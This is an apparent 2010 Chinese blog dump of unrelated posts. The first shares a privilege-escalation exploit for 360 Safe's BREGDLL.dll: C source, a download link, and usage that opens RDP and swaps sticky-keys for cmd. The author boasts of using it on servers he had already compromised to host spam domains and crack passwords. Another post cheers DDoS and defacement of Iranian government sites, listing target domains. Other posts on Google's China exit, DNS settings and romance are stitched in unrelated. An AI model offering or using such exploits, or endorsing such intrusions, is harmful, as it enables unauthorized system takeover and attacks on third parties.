不知道该说什么好了，以前拿了很多shell，一直懒得提权，一是没那个必要，二是提权太累了，三是服务器类型的肉鸡多了也没啥用。不过要是能让我一下子就成功提权，何乐而不为呢？

于是360本地提权来了，最近已经沸沸扬扬的了，不多发表过多评论，只是觉得做公司更要厚道；本人菜另外还有很多兄弟在360，不说什么了，发了本地提权的利用程序吧。friddy那里已经有一份了，是用来替换5下shift为cmd.exe的：360本地提权webshell下测试程序。

瑞星说是“bregdrv.sys和bregdll.dll”出的问题，然后http://www.sebug.net/exploit/19048/这个poc也是直接load这个dll的，于是这个利用程序也是基于这个的。webshell下使用，guest权限即可，需要Wscript.shell支持，功能主要是：

1.开启终端服务，端口为3389；用法：360.exe port

2.替换5下shift为cmd；用法：360.exe sethc

另外大家可以参考下包子的文章：360 0day漏洞及相关内幕，360很多dll存在类似的调用问题。据360的公告介绍已经打补丁了，具体是真是假，大家自己试试这个工具还能不能用吧。

这个工具不针对任何公司和个人，仅限爱好渗透的同学们进行交流。话说昨天从下午到晚上，我2、3年来拿到的仍然健在的shell的满足3389打开与安装了360安全卫士的服务器我都提了一下权，发现360在服务器的普及率也高的惊人，至少有80%，怪不得大家都提权提的爽死了，于是乎，很多肉鸡终于找到家了。

现在终于知道服务器类型的肉鸡的好处了，一是用来上线；二是用来摆放垃圾未备案域名；三是用来跑密码…看来之前轻视了。

演示：

(注：本图片只限学习，拒绝按此方法进行破坏或者瑞星公司拿此图片作为炒作)

下载：http://www.oldjun.com/download/360.exe

#include <windows.h>

typedef BOOL (WINAPI *INIT_REG_ENGINE)();
typedef LONG (WINAPI *BREG_DELETE_KEY)(HKEY hKey, LPCSTR lpSubKey);
typedef LONG (WINAPI *BREG_OPEN_KEY)(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult);
typedef LONG (WINAPI *BREG_CLOSE_KEY)(HKEY hKey);
typedef LONG (WINAPI *REG_SET_VALUE_EX)(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE* lpData, DWORD cbData);

BREG_DELETE_KEY BRegDeleteKey = NULL;
BREG_OPEN_KEY BRegOpenKey = NULL;
BREG_CLOSE_KEY BRegCloseKey = NULL;
REG_SET_VALUE_EX BRegSetValueEx = NULL;

#define AppPath                        "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe"

#define TestDeleteKey             HKEY_LOCAL_MACHINE
#define TestDeleteRegPath    "Software\\360Safe\\Update"

#define TestSetKey                   HKEY_LOCAL_MACHINE
#define TestSetPath                  "Software\\360Safe"

BOOL InitBRegDll()
{
         LONG lResult;
         HKEY hKey;

         CHAR cPath[MAX_PATH + 32] = { 0 };
         DWORD dwPathLen = MAX_PATH;

         lResult = RegOpenKeyA(HKEY_LOCAL_MACHINE, AppPath, &hKey);
         if (FAILED(lResult))
                  return FALSE;

         DWORD dwType = REG_SZ;
         lResult = RegQueryValueExA(hKey, "Path", NULL, &dwType, (LPBYTE)cPath, &dwPathLen);
         RegCloseKey(hKey);
         if (FAILED(lResult))
                  return FALSE;

         strcat(cPath, "\\deepscan\\BREGDLL.dll");

         HMODULE modBReg = LoadLibraryA(cPath);
         if (!modBReg)
                  return FALSE;

         INIT_REG_ENGINE InitRegEngine = (INIT_REG_ENGINE)GetProcAddress(modBReg, "InitRegEngine");
         BRegDeleteKey = (BREG_DELETE_KEY)GetProcAddress(modBReg, "BRegDeleteKey");
         BRegOpenKey = (BREG_OPEN_KEY)GetProcAddress(modBReg, "BRegOpenKey");
         BRegCloseKey = (BREG_CLOSE_KEY)GetProcAddress(modBReg, "BRegCloseKey");
         BRegSetValueEx = (REG_SET_VALUE_EX)GetProcAddress(modBReg, "BRegSetValueEx");

         if (!InitRegEngine || !BRegDeleteKey || !BRegOpenKey || !BRegCloseKey || !BRegSetValueEx) {
                  FreeLibrary(modBReg);
                  return FALSE;
         }

         if (!InitRegEngine()) {
                  FreeLibrary(modBReg);
                  return FALSE;
         }

         return TRUE;
}

LONG TestSetRegKey()
{
         HKEY hKey;
         LONG lResult;

         lResult = BRegOpenKey(TestSetKey, TestSetPath, &hKey);
         if (FAILED(lResult))
                  return lResult;

         DWORD dwType = REG_SZ;
         static char szData[] = "TEST VALUE";
         lResult = BRegSetValueEx(hKey, TestSetPath, NULL, dwType, (const BYTE *)&szData, (DWORD)sizeof(szData));
         BRegCloseKey(hKey);

         return lResult;
}

int main(int argc, char *argv[])
{
         if (!InitBRegDll()) {
                  MessageBoxA(NULL, "初始化BReg失败!", "失败", MB_ICONSTOP);
                  return 1;

         }
         if (FAILED(BRegDeleteKey(TestDeleteKey, TestDeleteRegPath))) {
                  MessageBoxA(NULL, "键值删除失败!", "失败", MB_ICONSTOP);
                  return 2;

         }

         if (FAILED(TestSetRegKey())) {
                  MessageBoxA(NULL, "设置键值失败!", "失败", MB_ICONSTOP);
                  return 3;
         }

         MessageBoxA(NULL, "突破系统安全检查，获得最高权限，漏洞利用成功!", "成功", MB_OK);
         return 0;
}

2010.02.05

程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

         无论我怎么气愤的想要离开，我的身体碰到她的时候却还是会兴奋，那加速的血液总是让我丧失理智。

         她急速的转身，移动身体，我看不清两腿的交替，只有屁股的扭动，然后消失在人群中。我无奈的转身，看着远处的车辆，继续往家走……

         自从手机丢了，卡丢了，钱也丢了。从此信心也丢了！但是哥的希望没丢，哥坚强的挺过来了。兄弟们，等着哥东山再起吧！向哥看齐吧，偶也！！！

以下为证：哥辉煌的今天

         消息传来，谷歌总部正在评估自己在中国商业运营的可行性，并可能完全退出中国市场。谷歌在中国的搜索引擎市场占有26%的市场份额。

         多年以来，谷歌公司以其创新精神和“不作恶”的商业伦理，在世界范围内获得了广泛赞誉。虽然业绩不如百度，但各界公认的是，谷歌中国是比百度更有原则、更负责任的公司。这也是为什么这一年来发生了谷歌色情门以及谷歌图书馆侵权事件，业界及中国网民却仍对谷歌不失敬意的原因。

         然而，谷歌公司所信奉的商业伦理必然会与中国目前的商业环境发生冲突。因此，选择退出还是留下，恐怕不仅仅是一个商业问题，而是其面临的道德困境。这个道德困境其实同样困扰着很多跨国公司。退出固然能够使谷歌保持道德上的某些原则，但无疑也会伤害无数中国用户的感情。而如果留下，或许只有两种选择：一是如很多跨国公司一样进行公司伦理的本土化，与现实的商业环境“同流合污”；二是被动地合作，为坚持原则而比竞争对手付出更多的代价。这其实需要一种自我牺牲的精神。应该说，无论做出怎样的选择，对谷歌公司来说都是痛苦的。

        谷歌公司怀有整合全人类信息的宏大梦想，要实现这个梦想，是不可能离开中国的。即便现在退出了中国，早晚也会在条件改善之后再回来。事实上，一个更良好的商业环境不会因为一个公司的退出而到来，更不会凭空从天上掉下来，其需要的正是在秉持“不抛弃、不放弃”的原则下日积月累的种种工作。如果真的把自己视为一个负责任的公司，谷歌为什么不选择和它的中国用户一起坚守下来呢？在一个劣币驱逐良币的市场环境中，良币其实不应首先自我放弃。

美国当地时间1月12日15时，谷歌高级副总裁和首席法律顾问大卫·多姆德(David Drummond)在谷歌官方博客上发文表示，谷歌集团考虑关闭“谷歌中国”网站以及中国办事处。

该博客宣称，我们已经决定，不愿意继续审查“谷歌中国”搜索到的结果。如果有可能的话，接下来的几周里，我们将和中国政府商议，在法律允许范围内运行一个不必经过过滤的搜索引擎。如果不能达成协议，可能意味着我们将不得不关闭“谷歌中国”，甚至是谷歌中国办事处。

———从Google的股价有多高就知道市场认为这公司有多重要，它确实代表了未来的方向。而且鉴于它和各行业切不断的联系，它一旦完全退出中国，可能引起连锁反应，尤其是互联网产业，这对任何人都没有好处，所以此时我只能希望这盘棋对局的多方不要把棋下死了。

———为什么在世界任何角落都钱途光明、简直就是互联网代名词的Google居然会觉得无利可图？背靠数亿使用中文的网民，现在赚不了大钱没关系，但对未来赚钱的前景如此悲观，实在是耐人寻味。

———我的Gmail邮箱怎么办？我跟Google的一切都应该怎么办？没有了Google，互联网跟局域网越来越像了。

———如果没有Google，我很好奇国内搞科研的人怎么搜索研究文献？

           虽然我知道中国不会存在不必经过过滤的搜索引擎，但是我还是幼稚的希望这一切会只是一个谎言。就像小时候想骗父母的一块钱为自己买个棒棒糖。

           Google，我是如此爱你，却只能沉默站在原地，像一个迷失孩子般，遗落在人群……留下吧。

1月12日早上，所谓的伊朗网军黑掉了中国著名商业网站 百度 www.baidu.com

一个小时候中国红客联盟，暗组技术论坛等很多知名黑客组织迅速组织力量奋起反击。ir 结尾的域名是伊朗国家域名，类似我们的 cn  就是中国的意思。

　   http://room98.ir/

http://ksh-behzisty.gov.ir/

http://www.irun.ir/

http://www.irib.ac.ir/

http://pankration.gov.ir/

http://www.iribu.ir/

http://www.diabetes.ir/home/#top  最可怜的是这个糖尿病网站，被N多人改来改去。

外交部    www.mfa.gov.ir

司法部    www.judiciary.ir

科技研究部    www.msrt.gov.ir

国防部    www.mod.gov.ir

内务部    www.moir.gov.ir

卫生与医药部    www.mohme.gov.ir

教育部    www.medu.gov.ir

文化与伊斯兰指导部    www.ershad.gov.ir

商业部   www.moc.gov.ir

农业圣战部   www.maj.gov.ir

福利与社会安全部    www.refah.gov.ir

这个时间段，伊朗的政府网站基本都瘫痪了，QQ群里的人都在用DDOS攻击没有漏洞的网站。我建议拿下伊朗领袖的站，不过，似乎没人愿意去做！今天是最有意思的一天

对于事件发生之后，大众往往把更多的注意力聚集在原因上，却忽略了对其利益链条上环环相扣的诸多环节的影响。更何况百度拥有庞大的利益集团，其日均 IP 访问量约为18,240,000，日均 PV 浏览量大约145,920,000，这对于一般网站是个望尘莫及的数字。正所谓“牵一发动全身”，可想而知，其影响程度更是难以比拟的。

虽然百度的利益链条不容小觑，但正反始终是相融于一体的，有消息传出，这次百度被黑导致百度亏损远超过700万，百度股价受断网影响下挫3.51% ，为1个月最低点。一家欢喜一家愁，百度此次事件引申的经济学远不止这些。

其一，由于百度断网11个小时，与之竞争的谷歌、搜搜、搜狗、中国雅虎等其他搜索引擎访问量明显攀升，尤其给谷歌这个百度冤家带来的机会不小，“百度”一词成为12日谷歌上升最快的关键词。只不过，1月13日，又有消息称，谷歌在其官方博客上表示，考虑关闭中国运营及Google.cn网站，致使在当天谷歌的盘后交易中股价挫跌1.3%，可见，谷歌的实际经济利益增长也不显著。

其二，之前有媒体曝光黑客灰色利益链出炉，且年收入可破百亿。显然，黑客群体的增长速度是难以预测的，加上曾有专家推测2010年黑客的数量又将有新的发展。在这次的百度事件中，黑客当然是最醒目的名词，由于中国黑客攻击行为并没有受到舆论的谴责，而是欢呼雀跃，原因在于其发扬了爱国主义，为中国争回了颜面，着实又让黑客火了一回。

其三，“百度被黑”了，“伊朗网军”出名了，米农们瞄准时机，开始抢注域名了：百度被黑(baidubeihei.com)、伊朗网军(yilangwangjun.com)等等相关域名迅速被注册。不过，国内刚刚对CN域名注册做了限制，预计与之相关的.CN域名无人注册。

其四，这次复仇行动远不止中国黑客，其中包括一个较疯狂的行为，一些中国网友组团给iranian.cyber.army@gmail.com(伊朗网军邮箱)发信：“A big FUCK YOU from China.”，为此以解心头之恨。但是这也需要考虑到对方的黑客身份，发信邮箱极有可能被黑，必然会注册马甲邮箱，故此邮箱注册增长并无可能。

         出租房这里上网速度实在是个慢，半夜两点房东都还跟我抢带宽。卡的受不了，猛然想起谷歌推出免费DNS服务了，轻轻一试，差点没吓死。速度快的惊人！！！！！！！

使用方法：如图所示,只需要把DNS服务器改为:：“8.8.8.8”和“8.8.4.4”即可

Google提供的公共DNS服务与电信或联通的不同，当用户输入一个错误的或者不存在的网址的时候，不会像中国电信一般直接弹出一个满屏都是广告的114页面，Google公司承诺绝不会重定或者过滤用户所访问的地址，而且绝无广告。这样也能很好的预防dns劫持/攻击了，速度又那么快，何乐而不为呢！哈哈

电信,铁通,联通/网通等dns服务器都不同,电信的114,联通/网通的域名纠错系统都是满屏的广告。DNS服务器维护还很不到位，不用它们了！！

她说：我在结婚前是不会**的？
当那天听到她的话得时候，我看得出她眼中的迷惑，我把眼光转了过来，看着不远处楼上的射灯……我没有回答她.很多时候我都在想,上床是一种交流还是一种伤害？是一种占有还是一种温暖？是一种放荡还是一种抒情？是一种堕落还是一种寂寞？是一种挑逗还是一种给予？有很多时候，我的脑子是模糊的。关于爱情，关于传统的美德和高尚。关于背叛和恶毒的辱骂。坦白的说,我心里还是很不舒服的.我不知道能不能做到,最主要的是,我或是我们有没有必要这样做?小心翼翼，我却没有

然后又在想，我们之间是不是有了代沟？或是她在顾虑什么呢？
我们有时候是不是把爱情划分得过于清楚了，怎样到了喜欢，什么程度到了爱，哪种阶段可以上床，甚至是只上床不做爱~！

呵~！再后来的这段时间里，越是想想，越是好笑~！非得那样子么？女孩？
只恨自己，当晚为什么不问问她，为什么要这样做/？
现在真的是一团糟了~~~！爱与恨，爱与性，要怎么去拿捏？

我在自己的日记里写下了这篇日记。女孩子都说如果换做是她们一定能做到，因为她们是女生，而我做不到，那是因为我是男生~~~~！这又有何区别啊？上帝？
这究竟是怎么了，如果换做是你
你能做到吗？
只上床不做。